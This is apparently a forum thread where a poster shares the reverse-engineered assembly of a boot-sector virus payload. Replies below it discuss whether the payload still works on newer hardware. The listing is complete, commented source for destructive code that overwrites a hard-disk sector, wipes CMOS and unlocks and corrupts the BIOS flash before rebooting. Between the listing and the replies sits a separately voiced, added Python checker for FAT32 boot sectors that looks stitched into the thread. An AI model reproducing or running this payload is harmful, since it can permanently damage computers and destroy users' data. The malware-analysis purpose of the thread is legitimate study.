Views: 2960  Replies: 4
Reverse analysis of part of a virus's code!
A while ago, while analyzing a virus, I noticed something: the virus wrote some data to the boot sector. After I dumped it, I found it was actually a piece of 16-bit code whose purpose is to destroy the BIOS; the principle is probably about the same as CIH. Everyone, please don't play with fire!
.386p
.model tiny
.code
org 0
EntryPoint:
    jmp AfterData
Version db "KILL OS", 0, 0 ; 8 bytes
bytesPerSector dw 0200h
sectorsPerCluster db 020h
ReservedSectors dw 0020h
Fats db 02h
onlyforFAT16 dw 0000h
Reserve1st dw 0000h
Harddisk db 0f8h
Reserve dw 000h
sectorsPerFat dw 003fh
NumberofHead dw 00ffh
hiddenSectors dd 00000000h
totalSectorsLarge dd 00000000h
sectorsofFAT dd 00002774h
MirrioofFAT dw 00h
diskVersion dw 00h
ClusterofROOT dd 02h
SectorofSyster dw 01h
SectorofBackup dw 06h
Reserves db 12 dup(0)
Physicaldriver dw 080h
Always db 029h
Enums dd 0e8a3804h
Labelofdriver db 11 dup(020h)
systemID db "FAT32 " ; the block above doesn't really need analysis; it is kept to stay faithful to the original!
AfterData:
    ; update DS to be 7C0 instead of 0
    push CS
    pop DS
    ; update ES also
    push CS
    pop ES
    ; create stack
    mov ax, 0000h
    mov ss, ax
    mov sp, 0FFFFh
    ; display message...
    lea si, Version
    call Print
    call Play
    call kill_hdd
    jmp kill_BIOS
Print:
    push ax
    mov ah, 14 ; BIOS code for screen display
    cld
print_loop:
    lodsb ; moving the character to be displayed to al
    or al, al ; checking if the char is NULL
    jz printdone
    int 10h ; Calling BIOS routine
    JMP print_loop
printdone:
    pop ax
    ret ; End of print procedure...
Play:
    mov di,0666h
    in al,061h
    or al,3
    out 061h,al
    mov al,0b6h
    out 043h,al
    mov dx,014h
    mov ax,04f38h
    div di
    out 042h,al
    mov al,ah
    out 042h,al
    ret
kill_hdd:
    mov dx, 1F2h
    mov al,1
    out dx,al
    inc dx
    out dx,al
    inc dx
    xor ax,ax
    out dx,al
    inc dx
    out dx,al
    mov al, 10100000b
    inc dx
    out dx,al
    inc dx
    mov al,30h
    out dx,al
    mov si, 0c000h
    mov dx, 1F0h
    mov cx, 513
    rep outsw
    RET
kill_BIOS:
    CLI ; dont interrupt me
    MOV CL, 128 ;map cmos
Nuke_CMOS_Byte:
    DEC CL ; done?
    JS Nuke_BIOS
    MOV AL, CL ; Request I/O to byte CL.
    OUT 70h, AL
    XOR AL, AL ; clear and write
    OUT 71h, AL
    JMP Nuke_CMOS_Byte ; Repeat until all is done.
Nuke_BIOS:
    ; Show BIOS Page in 000E0000 - 000EFFFF (64k).
    MOV EDI, 8000384Ch
    MOV BP, 0CF8h
    MOV DX, 0CFEh
    CALL IOForEEPROM
    ; Show BIOS Page in 000F0000 - 000FFFFF (64k).
    MOV DI, 0058h
    DEC DX
    CALL IOForEEPROM
    push 0e555h
    pop ds
    mov si,5
    push 0e2aah
    pop es
    MOV byte PTR ds:[si], 0aah
    MOV byte PTR ES:[0ah], 055h
    MOV BYTE PTR DS:[si],80h
    MOV byte PTR DS:[si],CL
    MOV byte PTR ES:[0ah], AL
    MOV BYTE PTR DS:[si], 60h
    mov ecx,0e2aaah
    LOOP $
    mov ecx,0e2aaah
    XOR AH, AH
    MOV WORD PTR DS:[si], 'RI'
    XCHG CX, AX
    LOOP $
    push 0f555h
    pop ds
    mov si,5
    mov ecx,0e2aaah
    MOV CH, 0AAh ; Enable EEPROM to Write.
    MOV BYTE PTR DS:[si], CL
    MOV byte PTR [ECX], AL
    MOV BYTE PTR DS:[si], 80h
    MOV byte PTR DS:[si], CL
    MOV byte PTR [ECX], AL
    MOV BYTE PTR DS:[si], 20h
    LOOP $
    ; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).
    xor al,al
    push 0fe00h
    pop ds
    mov si,0
    mov BYTE PTR DS:[SI],al
    CALL IOForEEPROM
    MOV AX,0040h
    MOV DS,AX
    MOV DI,0072h
    MOV WORD PTR DS:[DI],0 ; cold boot.
    MOV EAX,0FFFFH
    MOV CS,EAX
    JMP DWORD PTR CS:0000h ; reboot!
; I/O for EEPROM.
IOForEEPROM:
    XCHG DI, AX
    XCHG DX, BP
    OUT DX, AX
    XCHG DI, AX
    XCHG DX, BP
    IN AL, DX
    OR AL, 44h
    XCHG DI, AX
    XCHG DX, BP
    OUT DX, AX
    XCHG DI, AX
    XCHG DX, BP
    OUT DX, AL
    RET
; Make the file 512 bytes long
Other DB 55 DUP(0)
; Add the signature
MBREND dw 0AA55h
end EntryPoint
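The listing above begins with a FAT32 BIOS Parameter Block (BPB), so the simplest defensive check is to read sector 0 back and validate the BPB fields, the 0xAA55 signature, and the agreement with the backup copy that FAT32 keeps at the sector named by SectorofBackup (6 here). The following is an added example, not code from the original post: it packs the BPB values from the listing into the standard Microsoft FAT32 layout (field names follow that specification, not the labels in the listing), leaves the code region zeroed, and runs the checks over it. The jump bytes `EB 58 90` are a constructed placeholder, and the standard layout is an assumption about what a sane sector should look like.

```python
import struct
from typing import Dict, List

# Standard FAT32 BIOS Parameter Block (BPB) layout, bytes 0x00..0x59 of a boot
# sector, little-endian and unpadded. Field names follow the Microsoft FAT
# specification; the listing in the thread labels the same slots differently.
BPB_FORMAT = "<3s8sHBHBHHBHHHIIIHHIHH12sBBBI11s8s"
BPB_FIELDS = (
    "jmp_boot", "oem_name", "bytes_per_sector", "sectors_per_cluster",
    "reserved_sectors", "num_fats", "root_entry_count", "total_sectors16",
    "media", "fat_size16", "sectors_per_track", "num_heads", "hidden_sectors",
    "total_sectors32", "fat_size32", "ext_flags", "fs_version", "root_cluster",
    "fs_info", "backup_boot_sector", "reserved", "drive_number", "reserved1",
    "boot_signature", "volume_id", "volume_label", "fs_type",
)
BPB_SIZE = struct.calcsize(BPB_FORMAT)  # 90 bytes
SECTOR_SIZE = 512


def build_sample_sector() -> bytes:
    """Constructed sample: the BPB values from the thread's listing, packed in the
    standard layout, followed by a zeroed code region and the 0xAA55 signature.
    The listing's machine code is deliberately not reproduced."""
    bpb = struct.pack(
        BPB_FORMAT,
        b"\xEB\x58\x90",   # jmp short / nop: constructed placeholder, not the listing's encoding
        b"KILL OS\x00",    # OEM name slot, as in the listing
        0x0200, 0x20, 0x0020, 0x02, 0x0000, 0x0000,
        0xF8, 0x0000, 0x003F, 0x00FF, 0x00000000,
        0x00000000,        # total_sectors32: zero in the listing, which no real FAT32 volume has
        0x00002774, 0x0000, 0x0000, 0x00000002, 0x0001, 0x0006,
        b"\x00" * 12, 0x80, 0x00, 0x29, 0x0E8A3804,
        b" " * 11, b"FAT32   ",
    )
    return bpb + b"\x00" * (SECTOR_SIZE - 2 - len(bpb)) + b"\x55\xAA"


def parse_bpb(sector: bytes) -> Dict[str, object]:
    """Unpack the BPB and the trailing boot signature of a 512-byte sector."""
    if len(sector) < SECTOR_SIZE:
        raise ValueError("boot sector must be at least 512 bytes")
    fields = dict(zip(BPB_FIELDS, struct.unpack(BPB_FORMAT, sector[:BPB_SIZE])))
    fields["signature"] = struct.unpack_from("<H", sector, SECTOR_SIZE - 2)[0]
    return fields


def check_boot_sector(sector: bytes) -> List[str]:
    """Sanity-check a sector that claims to be a FAT32 boot sector.
    Returns a list of findings; an empty list means every check passed."""
    f = parse_bpb(sector)
    findings: List[str] = []
    if f["signature"] != 0xAA55:
        findings.append("missing 0xAA55 boot signature")
    if f["jmp_boot"][0] not in (0xEB, 0xE9):
        findings.append("first byte is not a JMP opcode (EB/E9)")
    if f["bytes_per_sector"] not in (512, 1024, 2048, 4096):
        findings.append(f"unusual bytes_per_sector {f['bytes_per_sector']}")
    spc = f["sectors_per_cluster"]
    if spc == 0 or spc & (spc - 1):
        findings.append(f"sectors_per_cluster {spc} is not a power of two")
    if f["reserved_sectors"] == 0:
        findings.append("reserved_sectors is zero")
    if f["num_fats"] not in (1, 2):
        findings.append(f"unusual num_fats {f['num_fats']}")
    if not all(0x20 <= b < 0x7F for b in f["oem_name"]):
        findings.append(f"OEM name {f['oem_name']!r} contains non-printable bytes")
    if f["fs_type"].startswith(b"FAT32"):
        if f["root_entry_count"] or f["total_sectors16"] or f["fat_size16"]:
            findings.append("FAT32 sector has non-zero FAT12/16-only fields")
        if f["total_sectors32"] == 0:
            findings.append("FAT32 total_sectors32 is zero: no addressable volume")
        if f["fat_size32"] == 0:
            findings.append("FAT32 fat_size32 is zero")
        if f["root_cluster"] < 2:
            findings.append(f"root_cluster {f['root_cluster']} is reserved")
        if f["fs_version"] != 0:
            findings.append(f"unknown FAT32 fs_version {f['fs_version']:#06x}")
    return findings


def diff_against_backup(primary: bytes, backup: bytes) -> List[str]:
    """FAT32 keeps a copy of sector 0 at backup_boot_sector (sector 6 in the
    listing). Return the names of BPB fields that differ between the two copies,
    plus 'boot_code' if the bytes between the BPB and the signature differ."""
    p, b = parse_bpb(primary), parse_bpb(backup)
    differing = [name for name in BPB_FIELDS + ("signature",) if p[name] != b[name]]
    if primary[BPB_SIZE:SECTOR_SIZE - 2] != backup[BPB_SIZE:SECTOR_SIZE - 2]:
        differing.append("boot_code")
    return differing


if __name__ == "__main__":
    sample = build_sample_sector()
    for line in check_boot_sector(sample):
        print("finding:", line)
```

Run against the constructed sector, the checker reports two findings: the OEM name slot holds a NUL byte, and total_sectors32 is zero, which no mountable FAT32 volume has. Run against a real disk, `diff_against_backup` should return an empty list for sector 0 versus sector 6; a non-empty list, especially one containing `boot_code`, means one of the two copies has been rewritten and is worth preserving for analysis before anything else touches the disk.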
Reply #1
Posted: 2007-07-18 12:29
That's old-style hard disk and BIOS stuff; it's ineffective against today's new hardware. Operating hardware directly means accounting for every kind of interface model, the code gets large, and that's inconvenient for writing a virus.
Reply #2
Posted: 2007-07-18 18:12
I find it strange: how does it read or write the hard disk without touching port 0x1f7? I also looked at the PCI bus, and there is no device 7 there, so I'd guess it has little destructive power. But I only have the one machine of my own, so I don't dare try it!
Reply #3
Posted: 2007-07-19 12:05
I've heard the BIOS int 13h interrupt can read and write the hard disk; I don't know whether it has anything to do with the ports?
Reply #4
Posted: 2007-07-19 16:29
int 13h is something like an API function the BIOS provides in 16-bit mode; programs that use it should be very portable.
Unfortunately the BIOS does not provide an API for operating the PCI bus.